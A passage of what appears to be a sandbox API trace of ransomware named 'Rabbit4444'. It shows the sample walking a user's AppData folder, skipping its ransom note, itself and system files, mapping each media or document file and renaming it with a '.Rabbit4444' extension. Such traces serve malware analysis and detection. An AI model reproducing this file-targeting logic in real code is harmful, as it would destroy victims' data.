BACK YOUR FILES.txt") returned -1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="Rabbit4444.exe") returned -1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2=".") returned 1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="..") returned 1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="windows") returned -1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="bootmgr") returned 1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="pagefile.sys") returned -1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="boot") returned 1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="ids.txt") returned -1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="NTUSER.DAT") returned -1 [0050.332] lstrcpyW (in: lpString1=0x130eb78, lpString2="CiU0ITa 8V.mp3" | out: lpString1="CiU0ITa 8V.mp3") returned="CiU0ITa 8V.mp3" [0050.332] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CiU0ITa 8V.mp3", dwFileAttributes=0x0) returned 1 [0050.332] lstrlenW (lpString="CiU0ITa 8V.mp3") returned 14 [0050.332] lstrlenW (lpString="Rabbit4444") returned 10 [0050.332] lstrcmpiW (lpString1="ITa 8V.mp3", lpString2="Rabbit4444") returned -1 [0050.333] lstrlenW (lpString=".dll") returned 4 [0050.333] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0050.333] lstrlenW (lpString=".lnk") returned 4 [0050.333] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0050.333] lstrlenW (lpString=".ini") returned 4 [0050.333] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0050.333] lstrlenW (lpString=".sys") returned 4 [0050.333] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0050.333] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CiU0ITa 8V.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ciu0ita 8v.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.333] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.333] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14164364584) returned 1 [0050.333] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3502) returned 1 [0050.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0050.333] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0050.333] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10b0, lpName=0x0) returned 0x298 [0050.333] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b0) returned 0x70000 [0050.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0050.334] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.334] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.334] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.334] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0050.334] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14164517158) returned 1 [0050.334] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0050.334] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0050.335] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.335] CloseHandle (hObject=0x298) returned 1 [0050.335] CloseHandle (hObject=0x278) returned 1 [0050.335] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CiU0ITa 8V.mp3.Rabbit4444") returned 57 [0050.335] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CiU0ITa 8V.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ciu0ita 8v.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CiU0ITa 8V.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ciu0ita 8v.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0050.336] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36a04520, ftCreationTime.dwHighDateTime=0x1d4c965, ftLastAccessTime.dwLowDateTime=0x6529af20, ftLastAccessTime.dwHighDateTime=0x1d4ce16, ftLastWriteTime.dwLowDateTime=0x6529af20, ftLastWriteTime.dwHighDateTime=0x1d4ce16, nFileSizeHigh=0x0, nFileSizeLow=0x86e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CmAysGSMk0dmaqiVK-.m4a", cAlternateFileName="CMAYSG~1.M4A")) returned 1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="Rabbit4444.exe") returned -1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2=".") returned 1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="..") returned 1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="windows") returned -1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="bootmgr") returned 1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="pagefile.sys") returned -1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="boot") returned 1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="ids.txt") returned -1 [0050.336] lstrcmpiW (lpString1="CmAysGSMk0dmaqiVK-.m4a", lpString2="NTUSER.DAT") returned -1 [0050.336] lstrcpyW (in: lpString1=0x130eb78, lpString2="CmAysGSMk0dmaqiVK-.m4a" | out: lpString1="CmAysGSMk0dmaqiVK-.m4a") returned="CmAysGSMk0dmaqiVK-.m4a" [0050.336] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CmAysGSMk0dmaqiVK-.m4a", dwFileAttributes=0x0) returned 1 [0050.336] lstrlenW (lpString="CmAysGSMk0dmaqiVK-.m4a") returned 22 [0050.336] lstrlenW (lpString="Rabbit4444") returned 10 [0050.336] lstrcmpiW (lpString1="aqiVK-.m4a", lpString2="Rabbit4444") returned -1 [0050.336] lstrlenW (lpString=".dll") returned 4 [0050.336] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.336] lstrlenW (lpString=".lnk") returned 4 [0050.336] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.336] lstrlenW (lpString=".ini") returned 4 [0050.336] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.336] lstrlenW (lpString=".sys") returned 4 [0050.337] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.337] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CmAysGSMk0dmaqiVK-.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cmaysgsmk0dmaqivk-.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.337] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.337] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14164745452) returned 1 [0050.337] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=34531) returned 1 [0050.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0050.337] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0050.337] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x89f0, lpName=0x0) returned 0x298 [0050.337] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x89f0) returned 0x70000 [0050.338] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.338] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.338] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.338] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.338] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14164917486) returned 1 [0050.338] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0050.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0050.339] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.339] CloseHandle (hObject=0x298) returned 1 [0050.339] CloseHandle (hObject=0x278) returned 1 [0050.340] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CmAysGSMk0dmaqiVK-.m4a.Rabbit4444") returned 65 [0050.340] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CmAysGSMk0dmaqiVK-.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cmaysgsmk0dmaqivk-.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CmAysGSMk0dmaqiVK-.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cmaysgsmk0dmaqivk-.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.340] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4902a540, ftCreationTime.dwHighDateTime=0x1d4cf15, ftLastAccessTime.dwLowDateTime=0x419a72f0, ftLastAccessTime.dwHighDateTime=0x1d4c57a, ftLastWriteTime.dwLowDateTime=0x419a72f0, ftLastWriteTime.dwHighDateTime=0x1d4c57a, nFileSizeHigh=0x0, nFileSizeLow=0xb70c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cNKcSEPhOVBzCC-S.swf", cAlternateFileName="CNKCSE~1.SWF")) returned 1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="Rabbit4444.exe") returned -1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2=".") returned 1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="..") returned 1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="windows") returned -1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="bootmgr") returned 1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="pagefile.sys") returned -1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="boot") returned 1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="ids.txt") returned -1 [0050.340] lstrcmpiW (lpString1="cNKcSEPhOVBzCC-S.swf", lpString2="NTUSER.DAT") returned -1 [0050.340] lstrcpyW (in: lpString1=0x130eb78, lpString2="cNKcSEPhOVBzCC-S.swf" | out: lpString1="cNKcSEPhOVBzCC-S.swf") returned="cNKcSEPhOVBzCC-S.swf" [0050.340] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\cNKcSEPhOVBzCC-S.swf", dwFileAttributes=0x0) returned 1 [0050.341] lstrlenW (lpString="cNKcSEPhOVBzCC-S.swf") returned 20 [0050.341] lstrlenW (lpString="Rabbit4444") returned 10 [0050.341] lstrcmpiW (lpString1="BzCC-S.swf", lpString2="Rabbit4444") returned -1 [0050.341] lstrlenW (lpString=".dll") returned 4 [0050.341] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0050.341] lstrlenW (lpString=".lnk") returned 4 [0050.341] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0050.341] lstrlenW (lpString=".ini") returned 4 [0050.341] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0050.341] lstrlenW (lpString=".sys") returned 4 [0050.341] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0050.341] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\cNKcSEPhOVBzCC-S.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cnkcsephovbzcc-s.swf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.341] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.341] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14165185311) returned 1 [0050.341] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=46860) returned 1 [0050.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0050.341] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xba10, lpName=0x0) returned 0x298 [0050.341] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xba10) returned 0x70000 [0050.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.343] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.343] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14165393463) returned 1 [0050.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.343] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0050.343] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.344] CloseHandle (hObject=0x298) returned 1 [0050.344] CloseHandle (hObject=0x278) returned 1 [0050.344] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\cNKcSEPhOVBzCC-S.swf.Rabbit4444") returned 63 [0050.344] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\cNKcSEPhOVBzCC-S.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cnkcsephovbzcc-s.swf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\cNKcSEPhOVBzCC-S.swf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cnkcsephovbzcc-s.swf.rabbit4444"), dwFlags=0x1) returned 1 [0050.345] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x457cf5d0, ftCreationTime.dwHighDateTime=0x1d4d387, ftLastAccessTime.dwLowDateTime=0x23d8aa70, ftLastAccessTime.dwHighDateTime=0x1d4d493, ftLastWriteTime.dwLowDateTime=0x23d8aa70, ftLastWriteTime.dwHighDateTime=0x1d4d493, nFileSizeHigh=0x0, nFileSizeLow=0xea08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CtsQxlryTc-FvxwK4.mp3", cAlternateFileName="CTSQXL~1.MP3")) returned 1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="Rabbit4444.exe") returned -1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2=".") returned 1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="..") returned 1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="windows") returned -1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="bootmgr") returned 1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="pagefile.sys") returned -1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="boot") returned 1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="ids.txt") returned -1 [0050.345] lstrcmpiW (lpString1="CtsQxlryTc-FvxwK4.mp3", lpString2="NTUSER.DAT") returned -1 [0050.345] lstrcpyW (in: lpString1=0x130eb78, lpString2="CtsQxlryTc-FvxwK4.mp3" | out: lpString1="CtsQxlryTc-FvxwK4.mp3") returned="CtsQxlryTc-FvxwK4.mp3" [0050.345] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CtsQxlryTc-FvxwK4.mp3", dwFileAttributes=0x0) returned 1 [0050.345] lstrlenW (lpString="CtsQxlryTc-FvxwK4.mp3") returned 21 [0050.346] lstrlenW (lpString="Rabbit4444") returned 10 [0050.346] lstrcmpiW (lpString1="FvxwK4.mp3", lpString2="Rabbit4444") returned -1 [0050.346] lstrlenW (lpString=".dll") returned 4 [0050.346] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0050.346] lstrlenW (lpString=".lnk") returned 4 [0050.346] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0050.346] lstrlenW (lpString=".ini") returned 4 [0050.346] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0050.346] lstrlenW (lpString=".sys") returned 4 [0050.346] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0050.346] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CtsQxlryTc-FvxwK4.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ctsqxlrytc-fvxwk4.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.346] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.346] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14165669659) returned 1 [0050.346] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=59912) returned 1 [0050.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0050.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0050.346] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xed10, lpName=0x0) returned 0x298 [0050.346] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xed10) returned 0x70000 [0050.348] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.348] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.348] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.348] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.348] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14165890420) returned 1 [0050.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0050.348] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0050.348] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.349] CloseHandle (hObject=0x298) returned 1 [0050.349] CloseHandle (hObject=0x278) returned 1 [0050.349] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\CtsQxlryTc-FvxwK4.mp3.Rabbit4444") returned 64 [0050.350] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CtsQxlryTc-FvxwK4.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ctsqxlrytc-fvxwk4.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CtsQxlryTc-FvxwK4.mp3.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ctsqxlrytc-fvxwk4.mp3.rabbit4444"), dwFlags=0x1) returned 1 [0050.350] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb503e80, ftCreationTime.dwHighDateTime=0x1d4cea2, ftLastAccessTime.dwLowDateTime=0x2b6aaa80, ftLastAccessTime.dwHighDateTime=0x1d4c585, ftLastWriteTime.dwLowDateTime=0x2b6aaa80, ftLastWriteTime.dwHighDateTime=0x1d4c585, nFileSizeHigh=0x0, nFileSizeLow=0x21ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DcYe75yxfBjHF71TD.pptx", cAlternateFileName="DCYE75~1.PPT")) returned 1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="Rabbit4444.exe") returned -1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2=".") returned 1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="..") returned 1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="windows") returned -1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="bootmgr") returned 1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="pagefile.sys") returned -1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="boot") returned 1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="ids.txt") returned -1 [0050.350] lstrcmpiW (lpString1="DcYe75yxfBjHF71TD.pptx", lpString2="NTUSER.DAT") returned -1 [0050.350] lstrcpyW (in: lpString1=0x130eb78, lpString2="DcYe75yxfBjHF71TD.pptx" | out: lpString1="DcYe75yxfBjHF71TD.pptx") returned="DcYe75yxfBjHF71TD.pptx" [0050.350] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DcYe75yxfBjHF71TD.pptx", dwFileAttributes=0x0) returned 1 [0050.350] lstrlenW (lpString="DcYe75yxfBjHF71TD.pptx") returned 22 [0050.350] lstrlenW (lpString="Rabbit4444") returned 10 [0050.351] lstrcmpiW (lpString1="F71TD.pptx", lpString2="Rabbit4444") returned -1 [0050.351] lstrlenW (lpString=".dll") returned 4 [0050.351] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0050.351] lstrlenW (lpString=".lnk") returned 4 [0050.351] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0050.351] lstrlenW (lpString=".ini") returned 4 [0050.351] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0050.351] lstrlenW (lpString=".sys") returned 4 [0050.351] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0050.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DcYe75yxfBjHF71TD.pptx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dcye75yxfbjhf71td.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.351] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 